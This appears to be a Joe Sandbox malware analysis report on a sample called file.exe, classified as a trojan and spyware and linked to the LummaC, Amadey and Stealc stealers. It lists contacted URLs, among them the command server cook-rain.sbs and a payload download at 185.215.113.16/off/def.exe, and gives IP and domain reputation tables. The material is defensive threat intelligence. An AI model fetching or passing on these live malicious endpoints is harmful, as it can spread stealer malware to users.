                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_108.7.drfalse
                                            high
                                            https://www.linkedin.com/cws/share?url=$chromecache_100.7.dr, chromecache_89.7.drfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Youssef1313chromecache_108.7.drfalse
                                                  high
                                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cook-rain.sbs/4file.exe, 00000000.00000003.2378263723.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2379238442.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2375572489.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_100.7.dr, chromecache_89.7.drfalse
                                                      high
                                                      https://aka.ms/msignite_docs_bannerchromecache_100.7.dr, chromecache_89.7.drfalse
                                                        high
                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_89.7.drfalse
                                                          high
                                                          https://cook-rain.sbs/apiBfile.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431421805.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417433721.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431168580.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://polymer.github.io/AUTHORS.txtchromecache_100.7.dr, chromecache_89.7.drfalse
                                                            high
                                                            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_108.7.drfalse
                                                              high
                                                              https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_100.7.dr, chromecache_89.7.drfalse
                                                                high
                                                                https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_108.7.drfalse
                                                                  high
                                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pshelpmechoosechromecache_100.7.dr, chromecache_89.7.drfalse
                                                                        high
                                                                        https://aka.ms/feedback/report?space=61chromecache_108.7.dr, chromecache_72.7.dr, chromecache_109.7.drfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://185.215.113.16/off/def.exepfile.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: phishing
                                                                            unknown
                                                                            https://learn-video.azurefd.net/vod/playerchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                              high
                                                                              https://twitter.com/intent/tweet?original_referer=$chromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                high
                                                                                https://github.com/gewarrenchromecache_108.7.drfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                      high
                                                                                      https://www.mozilla.orfile.exe, 00000000.00000003.2353751272.0000000005D27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_108.7.drfalse
                                                                                          high
                                                                                          https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_108.7.drfalse
                                                                                            high
                                                                                            https://client-api.arkoselabs.com/v2/api.jschromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                              high
                                                                                              https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                high
                                                                                                https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Thrakachromecache_108.7.drfalse
                                                                                                      high
                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://polymer.github.io/PATENTS.txtchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                            high
                                                                                                            https://aka.ms/certhelpchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                              high
                                                                                                              https://cook-rain.sbs/file.exe, file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2296160603.0000000001712000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/mairawchromecache_108.7.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://schema.orgchromecache_89.7.drfalse
                                                                                                                          high
                                                                                                                          http://polymer.github.io/LICENSE.txtchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://aka.ms/yourcaliforniaprivacychoiceschromecache_108.7.drfalse
                                                                                                                                    high
                                                                                                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/nschonnichromecache_108.7.drfalse
                                                                                                                                        high
                                                                                                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/adegeochromecache_108.7.drfalse
                                                                                                                                            high
                                                                                                                                            https://cook-rain.sbs/(file.exe, 00000000.00000003.2378263723.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2379238442.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346707549.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346895595.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346875346.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2375572489.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://cook-rain.sbs:443/apifile.exe, 00000000.00000003.2320204979.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2408998298.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2320812053.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2320005020.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://185.215.113.16:80/off/def.exefile.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/jonschlinkert/is-plain-objectchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://octokit.github.io/rest.js/#throttlingchromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/js-cookie/js-cookiechromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schema.org/Organizationchromecache_108.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://channel9.msdn.com/chromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/dotnet/trychromecache_100.7.dr, chromecache_89.7.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        13.107.246.45
                                                                                                                                                                        s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                        185.215.113.16
                                                                                                                                                                        unknownPortugal
                                                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                        188.114.97.3
                                                                                                                                                                        cook-rain.sbsEuropean Union
                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                        239.255.255.250
                                                                                                                                                                        unknownReserved
                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                        172.217.16.196
                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.6
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1560038
                                                                                                                                                                        Start date and time:2024-11-21 10:36:12 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 7m 17s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@24/64@9/6
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.89.167, 142.250.186.35, 142.251.173.84, 142.250.184.206, 95.101.150.2, 34.104.35.123, 199.232.214.172, 20.189.173.13, 172.217.23.106, 142.250.186.42, 216.58.212.138, 142.250.185.138, 142.250.184.202, 172.217.16.202, 172.217.18.10, 142.250.185.74, 216.58.206.42, 142.250.185.170, 142.250.186.74, 216.58.206.74, 142.250.186.138, 142.250.184.234, 142.250.186.106, 172.217.18.106, 2.19.126.156, 2.19.126.137, 20.189.173.24, 13.74.129.1, 204.79.197.237, 13.107.21.237, 142.250.186.67
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, onedscolprdwus12.westus.cloudapp.azure.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, azureedge-t-prod
                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 4540 because there are no executed function
                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: file.exe
                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        04:37:20API Interceptor58x Sleep call for process: file.exe modified
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • nam.dcv.ms/BxPVLH2cz4
                                                                                                                                                                        185.215.113.16file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                        s-part-0017.t-0009.t-msedge.netCB1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        s-part-0032.t-0009.t-msedge.net+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        Portfolio Review _2024.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUS96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 52.109.89.19
                                                                                                                                                                        https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.microGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.136.10
                                                                                                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.98.178.146
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.45
                                                                                                                                                                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        28a2c9bd18a11de089ef85a160da29e4https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779Get hashmaliciousKnowBe4Browse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        http://ahcli.comcastbiz.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.microGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
                                                                                                                                                                        • 13.107.246.60
                                                                                                                                                                        https://account.metasystemchat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 52.149.20.212
                                                                                                                                                                        • 184.28.90.27
